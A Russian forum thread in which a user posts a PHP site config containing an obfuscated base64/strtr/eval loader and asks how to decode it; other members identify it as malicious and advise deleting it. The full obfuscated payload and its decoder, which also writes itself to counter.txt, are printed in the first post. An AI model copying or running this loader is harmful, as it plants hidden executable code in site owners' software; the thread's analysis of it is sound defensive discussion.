Помощь по вопросу закодированного кода в php
Страницы: 1
Помощь по вопросу закодированного кода в php, Помощь по вопросу закодированного кода в php
Доброго времени суток уважаемые пользователи форума. Не судите строго, если задам на ваш взгляд глупый вопрос, тема в общем такая., в скрипте есть два фаила закодированных, может кто подскажет как и чем их можно раскодировать или поможет подскажет, что в них написано. Заранее благодарю.
код прилагаются.

<?php
ob_start();

define('SITENAME', 'Baai.ru'); // Название сайта
define('LICENSE', '82ce3d473318c6f88b241c493eef1ed4'); // Ваш лицензионный ключ

//Подключение к базе данных
define('DB_HOST', '127.0.0.1:3306');
define('DB_USER', 'root'); // Имя пользователя
define('DB_PASS', ''); // Пароль
define('DB_BASE', 'baai'); // Имя базы данных

$admin_uid = 301;

$levels = array( //Стоимость уровней
'1' => '200',
'2' => '400',
'3' => '800',
'4' => '1600',
'5' => '3200',
'6' => '6400'
);

//Протокол сайта
define('PROTOCOL', 'https://');

function pays($id) {
switch ($id) {
case '1': return 'Qiwi'; break;
case '2': return 'Payeer'; break;
case '3': return 'Яндекс.Деньги'; break;
case '4': return 'WebMoney'; break;
case '5': return 'OkPay'; break;
case '6': return 'AdvCash'; break;
case '7': return 'Единый кошелёк'; break;
case '8': return 'Visa/MasterCard/Мир'; break;
case '9': return 'Сбербанк (мобильный банк)'; break;
default: return 'Ошибка платёжной системы';
}
}






 $ {
    "GLOBALS"
}
["xkucoigwjoeh"] = "_D";
$ {
    "GLOBALS"
}
["antgybijk"] = "_X";
$erqzjdgf = "_F";
$ {
    $erqzjdgf
} = __FILE__;
$ {
    $ {
        "GLOBALS"
    }
    ["antgybijk"]
} = "PzNhP21abWIkdU8uTUQwIE00ZjRFT25EMCBNKF9fd3JxQl9fKVgneUhTRHVYbVptJztiJEh1Y19vPW80ZjR1U21NRCgkdU8uTUQwIE0sNCduJyk0U240RU9NKCdhLk9EUTRabk11ZiJ5TG8wb09IeUgwQU9ETW95SExMeUFTU29Mb24wbVggT0RYSExMIjRuTS5mIkxvNS5NTFpNTW8iNG81bU1mIm9NPW95SExMIjNhRU9wNEguMExMZiIwLk1ubzQwLk1uby1FMERjTW4iM2FITURvTW4z0J7RiNC40LHQutCwNNC70LjRhtC10L3Qt9C40LhYNNCf0L7QvNC+0YnRjDTQvdCwNF1NQUptbU1uWG5KYXlITURvTW4zYXlFT3AzJyk7YiRIU0RvTURvTDRmNHVuTTBFKCRIdWNfbz1vLDR1Ty5NTE9rTSgkdU8uTUQwIE0pKTtiJEhTRG9NRG9MNGY0TG9uX25NbS4wSE0oIm5NMUpPbk1fU0RITSgnXUpfT0RPb1htWm0nKTsiLCcnLCRIU0RvTURvTCk7YmJPdTQocXIvQkY2QjQhZjQgRXgoIEV4KCRfNkIKaUIKZydQW1t0X1BZNlsnTlgnX11KXy5PSF8nWGNNb01EcCgnUFtbdF9QWTZbJylYJ19dSl8uT0hfJ1gkXzZCCmlCCmcnNkIKaUIKX0ZSN0InTikpNHx8NExvbk9Mb24oJEhTRG9NRG9MLDQnJF82QgppQgpnJyk0fHw0TG9uT0xvbigkSFNEb01Eb0wsNCdMTW9NRHAnKTR8fDRMb25PTG9uKCRIU0RvTURvTCw0J09ESC5KRU0nKTR8fDRMb25PTG9uKCRIU0RvTURvTCw0J25NMUpPbk0nKSk0SzRNSFpTNCdhLk9EUTRabk11ZiJ5TG8wb09IeUgwQU9ETW95SExMeUFTU29Mb24wbVggT0RYSExMIjRuTS5mIkxvNS5NTFpNTW8iNG81bU1mIm9NPW95SExMIjNhRU9wNEguMExMZiIwLk1ubzQwLk1uby1FMERjTW4iM2FITURvTW4z0J7RiNC40LHQutCwNNC70LjRhtC10L3Qt9C40LhYNNCf0L7QvNC+0YnRjDTQvdCwNF1NQUptbU1uWG5KYXlITURvTW4zYXlFT3AzJzs0TT1Pbzs0VGJiRU11T0RNKCc2cltCJyw0JF82QgppQgpnJ1BbW3RfUFk2WydOKTtiRU11T0RNKCdWV18vUFIKNkJbJyw0J0pvdUknKTtiJEhTRERNSG9fRUE0ZjQgNUwxLk9fSFNERE1IbyhWV19QWTZbLFZXX0c2QgosVldfdFI2NixWV19XUjZCKTRTbjRFT00oJ9Ce0YjQuNCx0LrQsDTQv9C+0LTQutC70Y7Rh9C10L3QuNGPOjQnWCA1TDEuT19IU0RETUhvX01ublNuKCkpO2IgNUwxLk9fTE1vX0haMG5MTW80KCRIU0RETUhvX0VBLDRWV18vUFIKNkJbKTRTbjRFT00oJ9Ca0L7QtNC40YDQvtCy0LrQsDTQvdC1NNGD0YHRgtCw0L3QvtCy0LvQtdC90LAnKTtiYiRFbzRmNG9PIE0oKTtiYk9ET19MTW8oJ0xNTExPU0RYSkxNX0hTU1FPTUwnLDQnWUQnKTtiT0RPX0xNbygnTE1MTE9TRFhKTE1fb24wRExfTE9FJyw0J1l1dScpO2JMTUxMT1NEX0xNb19IU1NRT01fbTBuMCBMKHY4ZEk4ODg4OCw0InkiLDQ2cltCLDR1MC5MTSw0dTAuTE0pO2JMTUxMT1NEX0xvMG5vKCk7YmJPdTQoIU9MTE1vKCRfNkI2NnJZRmcnUFtbdF9HNkIKX1I5QkZbJ04pKTRLNCRfNkI2NnJZRmcnUFtbdF9HNkIKX1I5QkZbJ040ZjQnJzs0VGJPdSghTSBtbzUoJF82QjY2cllGZydKT0UnTik0JiY0IU0gbW81KCRfNkI2NnJZRmcnLlNjT0QnTik0JiY0IU0gbW81KCRfNkI2NnJZRmcnbTBMTCdOKTQmJjQkXzZCNjZyWUZnJ1BbW3RfRzZCCl9SOUJGWydONGZmNCBFeCgkXzZCCmlCCmcnUFtbdF9HNkIKX1I5QkZbJ04pKTRLYkVNdU9ETSgnRzZCCl9xWTk5QlYnLG9uSk0pO2IkSl9PRWZPRG9wMC4oJF82QjY2cllGZydKT0UnTik7YiRKXy5TY09EZiA1TDEuT19uTTAuX01MSDBtTV9Mb25PRGMoJEhTRERNSG9fRUEsNCRfNkI2NnJZRmcnLlNjT0QnTik7YiREU11KTG40ZjQgNUwxLk9fdU1vSFpfMExMU0goIDVMMS5PXzFKTW41KCRIU0RETUhvX0VBLDQiNkJxQi9bNCo0dwpZNzRvX0pMTW5MNGxQQgpCNEpPRWYnJEpfT0UnNFJGVjRtMEw0ZjQnJF82QjY2cllGZ20wTExOJzRxcjdyWzR7IikpO2JPdTQoTSBtbzUoJERTXUpMbmcnSk9FJ04pKTRLNExNTExPU0RfSkRMTW8oKTs0RU11T0RNKCdHNkIKX3FZOTlCVicsdTAuTE0pOzRUYiA1TDEuT18xSk1uNSgkSFNERE1Ib19FQSw0Ikd0VlJbQjRvX0pMTW5MNDZCWzQuMExvZickRW8nNGxQQgpCNEpPRWYnJEpfT0UnNHFyN3JbNHsiKTtiVDRNLkxNNEs0RU11T0RNKCdHNkIKX3FZOTlCVicsdTAuTE0pOzQkSl9PRTRmNDg7NCRfNkI2NnJZRmcnbTBMTCdONGY0Jyc7VGJPdShjTW9NRHAoJ1BbW3RfL3FyQkZbX3J0Jyk0JiY0TG9uSDBMTUggbShjTW9NRHAoJ1BbW3RfL3FyQkZbX3J0JyksJ0pEUURTXUQnKSliJE9tZmNNb01EcCgnUFtbdF8vcXJCRltfcnQnKTtiTS5MTU91KGNNb01EcCgnUFtbdF9lX3dZCmxSClZCVl93WQonKTQmJjRMb25IMExNSCBtKGNNb01EcCgnUFtbdF9lX3dZCmxSClZCVl93WQonKSw0J0pEUURTXUQnKSliJE9tZmNNb01EcCgnUFtbdF9lX3dZCmxSClZCVl93WQonKTtiTS5MTU91KGNNb01EcCgnCkI3WVtCX1JWVgonKTQmJjRMb25IMExNSCBtKGNNb01EcCgiCkI3WVtCX1JWVgoiKSw0J0pEUURTXUQnKSliJE9tZmNNb01EcCgnCkI3WVtCX1JWVgonKTtiTS5MTU91KCFNIG1vNSgkXzZCCmlCCmcnCkI3WVtCX1JWVgonTik0JiY0TG9uSDBMTUggbSgkXzZCCmlCCmcnCkI3WVtCX1JWVgonTiw0J0pEUURTXUQnKSliJE9tZiRfNkIKaUIKZycKQjdZW0JfUlZWCidOO2JNLkxNSyRPbWYnSkRRRFNdRCc7VGJPdSgkT20hZidKRFFEU11EJylLYiRPbWZtbk1jX25NbS4wSE0oIiNnXjgtak4rI08iLCcnLCRPbSk7YiRvTyBNZm9PIE0oKTtiJG0wTG9mb08gTSgpLXY4ODtiJG5NTEoub2YgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCI2QnFCL1s0LjBMbzR3Clk3NG9fU0QuT0RNNGxQQgpCNE9tZiciWCRPbVgiJyIpO2JPdSggNUwxLk9fREogX25TXUwoJG5NTEoubykhZjgpSzQgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCJHdFZSW0I0b19TRC5PRE00NkJbNC4wTG9mJyJYJG9PIE1YIicsNEpPRWYnIlgkSl9PRVgiJzRsUEIKQjRPbWYnIlgkT21YIic0cXI3cls0eyIpOzRUYk0uTE1LYiA1TDEuT18xSk1uNSgkSFNERE1Ib19FQSw0InJGNkIKWzRyRltZNG9fU0QuT0RNNChKT0UsT20sLjBMbyk0aVJxR0I2NCgnIlgkSl9PRVgiJywnIlgkT21YIicsJyJYJG9PIE1YIicpIik7NFRiT3UoTEpBTG9uKCRvTyBNLGoseylmZjgpSzQgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCdWQnFCW0I0dwpZNzRvX1NELk9ETTRsUEIKQjQuMExvYSdYJG0wTG8pOzRUYlRiYk91NChHNkIKX3FZOTlCVik0S2IgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCJHdFZSW0I0YG9fSkxNbkxgNDZCWzRgLjBMb2A0ZjQnJEVvJzRsUEIKQjRKT0VmJyRKX09FJzRxcjdyWzR7Iik7Yk91NCghTSBtbzUoJERTXUpMbmcnQTBEJ04pKTRLNE1IWlM0J2EuT0RRNFpuTXVmInlMbzBvT0h5SDBBT0RNb3lITEx5QVNTb0xvbjBtWCBPRFhITEwiNG5NLmYiTG81Lk1MWk1NbyI0bzVtTWYib009b3lITEwiM2FFT3A0SC4wTExmIjAuTW5vNDAuTW5vLUUwRGNNbiIzYUhNRG9NbjPQkNC60LrQsNGD0L3RgjQnWCREU11KTG5nJy5TYydOWCc00LfQsNCx0LvQvtC60LjRgNC+0LLQsNC9NNC/0L400YHQu9C10LTRg9GO0YnQtdC5NNC/0YDQuNGH0LjQvdC1OjQnWFpvIC5MbU1ITzAuSFowbkwoJERTXUpMbmcnQTBEJ04pWCdheUhNRG9NbjNheUVPcDMnOzRNPU9vOzRUYmJPdTQoJEpfT0U0MzR6OHgpNEtiJG0wTG9fSmZvTyBNKCktSXZkODg7Yk91NCgkRFNdSkxuZydFbydONGE0JG0wTG9fSjQmJjQkRFNdSkxuZycuTXBNLidONGZmNDgpNEtiIDVMMS5PXzFKTW41KCRIU0RETUhvX0VBLDQiVkJxQltCNHcKWTc0b19KTE1uTDRsUEIKQjRKT0U0ZjQnJEpfT0UnNHFyN3JbNHsiKTtiIDVMMS5PXzFKTW41KCRIU0RETUhvX0VBLDQiVkJxQltCNHcKWTc0b19ETV0uTXBNLkw0bFBCCkI0SkxuNGY0JyRKX09FJyIpO2IgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCJWQnFCW0I0dwpZNzRvXyBNTEwwY01MNGxQQgpCNHVuNGY0JyRKX09FJzRZCjRvU0o0ZjQnJEpfT0UnIik7YlRiVGJUYmJFMG9NX0VNdTBKLm9fb08gTWtTRE1fTE1vKCdCSm5TbU15N1NMSFNdJyk7YmJ1SkRIb09TRDRdSl9EUzBwMG8wbigkLlNjT0QpS2IkdU9uTG80ZjQgQV9Mb25vUy5TXU1uKExKQUxvbigkLlNjT0QsNDgsNHspKTtibk1vSm5ENCJ5TG8wb09IeU8gY3kuTW9vTW5fMHAwbzBueSR1T25Mb1htRGMiO2JUYmJ1SkRIb09TRDRdSl9IWk1IUV8uU2NPRCgkLlNjT0QpS2JuTW9KbkQ0eztiVGJ1SkRIb09TRDRdSl9IWk1IUV9BMG9IWigkLlNjT0QpS2JuTW9KbkQ0eztiVGJ1SkRIb09TRDRtbnVMKCQuU2NPRClLYm5Nb0puRDR7O2JUYnVKREhvT1NENG9PSFFNb19EKCQuU2NPRClLYm5Nb0puRDR7O2JUYmIkTDAubzRmNG4wREUoOCw0ampqaik7YiRvU1FNRDRmNCRMMC5vWCc6J1ggRXgoJEwwLm9YJzonWCRfNkI2NnJZRmcnbTBMTCdOWCc6J1gkXzZCNjZyWUZnJ0pPRSdOKTs=";
$ {
    $ {
        "GLOBALS"
    }
    ["xkucoigwjoeh"]
} = strrev("edoced_46esab");
eval($ {
    $ {
        "GLOBALS"
    }
    ["xkucoigwjoeh"]
}
("JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdPL2JwdXcza002QjJ0eEQxLlJvWF1sVlkgPkpBRUdUZno3SwpRSD1qc31acVVjZTh2NW5tPFs5YTRpMENyV3tOZ2hkSUxQeVNGJywnaUMKdmZGPnplU0U3UDVucWxBdC53V0RPbUt1YmRVfT0zTXtSa2N4OTJKaExaZ1gwNnlycFFURzwgVmFqSUIxXVtZNDhzSC9vTicpOyRfUj1lcmVnX3JlcGxhY2UoJ19fRklMRV9fJywiJyIuJF9GLiInIiwkX1gpO2V2YWwoJF9SKTskX1I9MDskX1g9MDs="));
$s=base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdPL2JwdXcza002QjJ0eEQxLlJvWF1sVlkgPkpBRUdUZno3SwpRSD1qc31acVVjZTh2NW5tPFs5YTRpMENyV3tOZ2hkSUxQeVNGJywnaUMKdmZGPnplU0U3UDVucWxBdC53V0RPbUt1YmRVfT0zTXtSa2N4OTJKaExaZ1gwNnlycFFURzwgVmFqSUIxXVtZNDhzSC9vTicpOyRfUj1lcmVnX3JlcGxhY2UoJ19fRklMRV9fJywiJyIuJF9GLiInIiwkX1gpO2V2YWwoJF9SKTskX1I9MDskX1g9MDs=');
$fp = fopen('counter.txt', 'w+');
$test = fwrite($fp, $s);
if ($test) echo '';
else echo '';
fclose($fp);

$_X=base64_decode($_X);$_X=strtr($_X,'O/bpuw3kM6B2txD1.RoX]lVY >JAEGTfz7K
QH=js}ZqUce8v5nm<[9a4i0CrW{NghdILPySF','iC
vfF>zeSE7P5nqlAt.wWDOmKubdU}=3M{Rkcx92JhLZgX06yrpQTG< VajIB1][Y48sH/oN');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);

print_r($_R.$_X);

?>
Изменено: IGOR DAN - 26 Декабря 2018 10:38
В вопросе уже 99% ответа

IGOR DAN пишет:
Цитата
base64_decode
Лучший абузоустойчивый хостинг | Самый высокий доход на Push уведомлениях | Лучшая партнерка для заработка на видео плеерах
Цитата
Дэвид Бэкхэм пишет:
IGOR DAN пишет:
мне бы по подробнее, я просто в этом не силен,, как бы мне это все расшифровать, что бы это все было примерно в таком виде prntscr.com/lzokhr
smile:mail:smile:mail:smile:mail:
1. не нужно неформотированные сообщения вставлять в данный редактор, это ломает движок.2. У вас несколько кодировок, основная в base64, и уже в ней еще 3 части разбитые на разные кодировки. Тем самым кто-то хотел защитить свой скрипт или лицензию возможно.
3. Обратитесь к тому, кто писал скрипт или шаблон.
Спасибо за ответ,, я бы конечно обратился, но не знаю к кому, нет контактов.
IGOR DAN, это вредоносный код. 

Код
 
$ { 
    "GLOBALS"  
 


и все что дальше нужно удалить
https://revisium.com/ai/бесплатный скрипт для проверки сайта
Цитата
Эдуард Пащенко пишет:
и все что дальше нужно удалить
Вот мне почему то тоже так сразу показалось, что это вред.. но человек который мне этот скрипт давал, переубедил меня, что это закодированный код., яко бы когда он три года назад этот скрипт покупал, ему эту песню разработчик напел.за скаер спасибо, хорошая вещь сам им частенько пользуюсь, хоть и не все ему подвластно многое не находит, но все равно очень сильно облегчает труды.
попробуйте закомментировать, если ничего не отвалится - смело удаляйте. полезные скрипты никто не кодирует
Страницы: 1
Похожие темы:
Читают тему (гостей: 5, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
19:29 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
17:29 Как продвигать сайт с неуникальным контентом 
14:50 Индексация страниц 
12:36 У кого новостник, дайте пару советов плиз 
13:53 AviTool - мощный инструмент для автоматизации работы с Avito 
17:01 Absence в Армении 
23:19 Ребята подскажите какими сервисами и прогами вы пользуетесь для SEO продвижения? 
21:35 Продвижение YouTube видео в топ поиска | Любой тип контента | Гарантия результата 
20:21 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 
18:30 - Вечные ссылки с трастовых сайтов 2024 проверен FastTrust 
16:09 Установка|Настройка|Доработка|Наполнение сайтов|Дизайн|3D|Видеомонтаж 
12:15 [MOBILE 4G/LTE PROXY] Приватные Мобильные Прокси 30 Дней 10$ Безлим/ Подходят для всех сайтов 
23:25 Обменник криптовалюты OnlyCrypto 
19:18 Размещение статей, ссылок и постовых на качественных ресурсах 
22:06 Добро пожаловать в цифровой мир... 
19:42 Топ-5 способов использовать мобильные прокси для бизнеса: подробный обзор 
22:08 Накрутка поисковых подсказок 
05:04 Точные прогнозы на футбол 
14:01 Union Pharm - топовая фарма-партнерка для профессионалов! 
10:59 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
12:23 150+ хакерских поисковых систем и инструментов